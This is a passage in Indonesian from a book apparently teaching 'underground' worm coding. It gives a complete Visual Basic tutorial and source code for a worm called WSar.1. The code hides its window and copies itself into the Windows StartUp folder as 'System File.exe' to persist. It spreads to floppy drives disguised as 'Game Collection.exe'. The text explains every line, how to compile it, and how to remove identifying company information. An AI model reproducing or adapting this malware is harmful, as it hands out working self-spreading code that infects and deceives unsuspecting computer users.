7.3 PEMROGRAMAN Buka aplikasi Visual Basic. Pada kotak dialog New Project klik icon Standard EXE pada tab New dan klik Open, untuk menampilkan kotak dialog New Project bisa dengan klik File pada menubar kemudian pilih New Project.
106
Jasakom
Computer Worm 1 - Secret of Undeground Coding : Uncensored
Sebagai langkah pertama, aturlah Project Properties dengan mengklik kanan nama project pada jendela Project Explorer yang dalam hal ini nama project masih bernama Project1, kemudian klik 'Project1 Properties…’
107
Jasakom
Bab 7. Worm WSar.1
Visual basic secara otomatis memberikan sebuah project dengan nama default Project1 dan sebuah form di dalamnya dengan nama default Form1.
Computer Worm 1 - Secret of Underground Coding : Uncensored
Akan tampil kotak dialog Project Properties dan berada pada tab General. Ganti Project Name dari nama Project1 menjadi nama worm yaitu: WSar. Dalam pengisian Project Name, tidak boleh menggunakan spasi, tanda titik, tanda koma atau karakter spesial lainnya. Untuk melanjutkan pindah ke menu Make dengan mengklik tab Make.
Bab 7. Worm WSar.1
Ganti Application Title dari nama Project1 menjadi nama worm yaitu: WSar.1 kemudian hapus value untuk setiap Type pada frame Version Information, terutama untuk Type Company Name. Tentunya Anda tidak ingin nama perusahaan tempat Anda bekerja menjadi terkenal oleh worm ini bukan ? Jika value yang dihapus ternyata kembali saat project di-load Anda bisa menghapusnya lagi dan menambahkan sebuah karakter spasi. Kemudian pindah ke menu Compile dengan mengklik tab Compile.
108
Jasakom
Computer Worm 1 - Secret of Undeground Coding : Uncensored
Bab 7. Worm WSar.1
Pilih opsi Compile to P-Code. Opsi ini akan membuat program yang dihasilkan berukuran lebih kecil daripada menggunakan opsi Compile to Native Code. Akhiri dengan menekan tombol OK.
Langkah kedua adalah mengatur properties pada form, dengan mengklik nama form pada jendela Project Explorer. Dalam hal ini, nama form masih bernama Form1, secara otomatis segala properti pada Form1 akan ditampilkan pada jendela Properties. Anda juga bisa meng-klik ComboBox pada jendela Properties dan pilih object Form1.
109
Jasakom
Computer Worm 1 - Secret of Underground Coding : Uncensored
Kemudian atur jenis properti berikut ini pada Form1: Jenis
Nilai
Keterangan
Name
frmWSar1
Mengatur nama form menjadi frmWSar1
Icon
(Icon)
Pilih icon yang akan digunakan pada form, WSar.1 menggunakan icon folder. ico
ShowInTaskbar
False
Tidak menampilkan form pada taskbar
Visible
False
Tidak menampilkan form pada layar.
Langkah ketiga adalah menambahkan object Timer pada form yang bertujuan untuk melakukan perulangan terhadap instruksi tertentu tanpa memerlukan suatu interaksi oleh user. Untuk itu klik ganda object Timer pada toolbox yang akan membuat sebuah object Timer dengan nama default Timer1, kemudian atur jenis properti berikut ini pada Timer1: Bab 7. Worm WSar.1
Jenis
Nilai
Keterangan
Name
tmrWSar
Mengatur nama Timer menjadi tmrWSar
Enable
True
Pastikan Timer akan aktif saat form di-load
Interval
60000
Setiap instruksi pada procedure Timer akan dieksekusi setiap 1 menit
Langkah keempat adalah mengetikan kode program worm. Untuk itu klik ganda bidang form hingga jendela Code Editor tampil dengan langsung membuat suatu sub 'Form Load’. Anda juga bisa mengklik nama form pada jendela Explorer, klik tombol View Code kemudian klik ComboBox Object pada Code Editor dan pilih Form, klik ComboBox Event dan pilih Load.
110
Jasakom
Computer Worm 1 - Secret of Undeground Coding : Uncensored
Ketik kode program berikut ini: 'WSar.1 by Achmad Darmal 'Tarakan, Kalimantan Timur - Indonesia Option Explicit On
Bab 7. Worm WSar.1
Private Sub Form_Load() On Error Resume Next If App.PrevInstance = True Then End If Len(Dir$("C:\WINDOWS\Start Menu\Programs\StartUp\Syst" & _ "em File.exe")) = 0 Then FileCopy(WormFile, "C:\WINDOWS\Start Menu\Programs\Star" & _ "tUp\System File.exe") End If If App.Path = "A:\" Or App.Path = "B:\" Then Unload(Me) End If End Sub Private Sub tmrWSar_Timer() On Error Resume Next If Len(Dir$("A:\Game Collection.exe")) = 0 Then FileCopy(WormFile, "A:\Game Collection.exe") End If If Day(Now) = 13 And Month(Now) = 10 Then MsgBox("WSar.1 Ada Pada Komputer Anda") Unload(Me) End If End Sub Private Function WormFile() Dim WPath, WName As String WPath = App.Path If Right(WPath, 1) <> "\" Then WPath = WPath & "\" End If WName = App.EXEName & ".exe" WormFile = WPath & WName End Function
111
Jasakom
Computer Worm 1 - Secret of Underground Coding : Uncensored
Berikut penjelasan tentang kode program: 'WSar.1 by Achmad Darmal 'Tarakan, Kalimantan Timur – Indonesia Option Explicit
Dua baris teratas adalah baris komentar, diawali dengan single quote. Biasanya digunakan untuk memberi keterangan tentang program atau apapun yang ingin programmer sampaikan kepada pengguna kode tersebut. Statement Option Explicit pada baris ketiga memastikan agar seluruh variabel dideklarasikan. Private Sub Form_Load()
Bab 7. Worm WSar.1
Baris ini menandakan awal dari sebuah procedure, dalam hal ini adalah procedure yang akan dikerjakan pada event Form_Load, suatu kejadian saat form diaktifkan untuk pertama kali atau sesaat sebelum ditampilkan. On Error Resume Next
Statement ini akan sangat berguna apabila terjadi suatu kesalahan, karena program akan mengacuhkan kesalahan tersebut dan kemudian mengakses instruksi setelahnya. If App.PrevInstance = True Then End
Jika file aplikasi yang sama sudah berjalan maka akhiri proses pengeksekusian file tersebut. Statement ini berguna untuk mencegah suatu file aplikasi yang sama dieksekusi lebih dari satu kali. If Len(Dir$("C:\WINDOWS\Start Menu\Programs\Star" & _ "tUp\System File.exe")) = 0 Then
Jika banyak karakter dalam pencarian "C:\WINDOWS\Start Menu\ Programs\StartUp\System File.exe" adalah 0 (nol) maka file tersebut tidak ditemukan (sebaliknya akan menghasilkan nilai 15 jika file tersebut ditemukan. Nilai 15 berasal dari jumlah karakter pada nama file), maka…
112
Jasakom
Computer Worm 1 - Secret of Undeground Coding : Uncensored
FileCopy WormFile, "C:\WINDOWS\Start Menu\Prog" & _ "rams\StartUp\System File.exe"
FileCopy adalah function untuk membuat salinan suatu file. WormFile mewakili nama main file (file utama) yang terproses. WormFile adalah suatu function untuk mendapatkan full path (alamat penuh) file utama, Sedangkan "C:\WINDOWS\StartMenu\Programs\StartUp\System File.ex e" adalah lokasi dan nama file untuk tujuan penyalinan file,
Jika path file utama pada drive A atau pada drive B maka akhiri aplikasi. Statement ini bertujuan untuk mencegah file worm yang berada pada disket bertahan di memory. Hal ini sebaiknya juga dilakukan untuk setiap removable disk, seperti disket dan usb disk. Akhirnya, End If digunakan untuk menutup statement If sebelumnya. End Sub
Statement End Form_Load.
Sub
berfungsi
untuk
mengakhiri
procedure
Private Sub tmrWSar_Timer() On Error Resume Next If Len(Dir$("A:\Game Collection.exe")) = 0 Then FileCopy(WormFile, "A:\Game Collection.exe") End If If Day(Now) = 13 And Month(Now) = 10 Then MsgBox("WSar.1 Ada Pada Komputer Anda") Unload(Me) End If End Sub
Memulai suatu procedure baru terhadap object tmrWSar (Timer), mengacuhkan error apabila terjadi dan mengeksekusi instruksi setelahnya. Jika file "A:\Game Collection.exe" tidak ditemukan maka meng-copy file utama ke drive A dengan nama "Game Collection.exe". Jika tanggal sekarang adalah 13 dan bulan sekarang adalah 10 (Okto-
113
Jasakom
Bab 7. Worm WSar.1
If App.Path = "A:\" Or App.Path = "B:\" Then Unload Me End If
Computer Worm 1 - Secret of Underground Coding : Uncensored
ber) maka tampilkan pesan "WSar.1 Ada Pada Komputer Anda" serta bersihkan worm dari memory, sehingga untuk hari tersebut worm tidak akan melakukan aktifitas apapun. Private Function WormFile() Dim WPath, WName As String WPath = App.Path If Right(WPath, 1) <> "\" Then WPath = WPath & "\" End If WName = App.EXEName & ".exe" WormFile = WPath & WName End Function
Function WormFile dibuat untuk mendapatkan path penuh file utama, dimulai dengan pendeklarasian WPath untuk lokasi dan WName untuk nama file, kemudian menentukan lokasi file utama dengan function App.Path dan menyimpannya dalam variabel WPath..
Bab 7. Worm WSar.1
Jika satu karakter disebelah kanan nilai variabel WPath tidak sama dengan "\" maka nilai variabel WPath ditambahkan karakter "\" dibelakangnya, kemudian mengatur nilai variabel WName dengan nilai berupa nama file utama yang didapat dari function App.EXEName. Karena nama file yang didapatkan dari function ini belum memiliki ekstensi, maka ditambahkan string ".exe" dibelakangnya, menandakan file tersebut adalah file executable.
Langkah kelima adalah menyimpan project yang telah selesai dibuat, dengan meng-click File pada menubar kemudian pilih Save Project.
114
Jasakom
Computer Worm 1 - Secret of Undeground Coding : Uncensored
Berikutnya akan tampil kotak dialog Save Project As, yang berfungsi untuk menyimpan project secara keseluruhan.
Langkah terakhir adalah mengkompilasi project menjadi suatu file executable. Untuk itu klik File pada menubar, kemudian dalam hal ini klik Make WSar. Exe yang akan menampilkan kotak dialog Make Project,
115
Jasakom
Bab 7. Worm WSar.1
Kemudian akan tampil kotak dialog Save File As, yang berfungsi untuk menyimpan form, module dan sebagainya yang akan disimpan. Tentukan suatu folder atau buat folder baru dengan mengklik tombol New Folder.
Computer Worm 1 - Secret of Underground Coding : Uncensored
Isi TextBox File name dengan nama File Exe yang akan dibuat yang dalam contoh ini bernama WSar.exe. Pilih direktori tempat file tersebut akan diletakkan. Klik OK untuk memulai proses kompilasi. Catatan untuk WSar.1 : untuk lokasi direktori StartUp pada Windows 2000 dan XP secara default adalah sebagai berikut: 1. C:\Documents and Settings\Administrator\Start Menu\ Programs\startup 2. C:\Documents and Settings\All Users\Start Menu\Progra ms\ startup 3. C:\Documents and Settings\Default User\Start Menu\ Programs\ startup
Bab 7. Worm WSar.1
116
Jasakom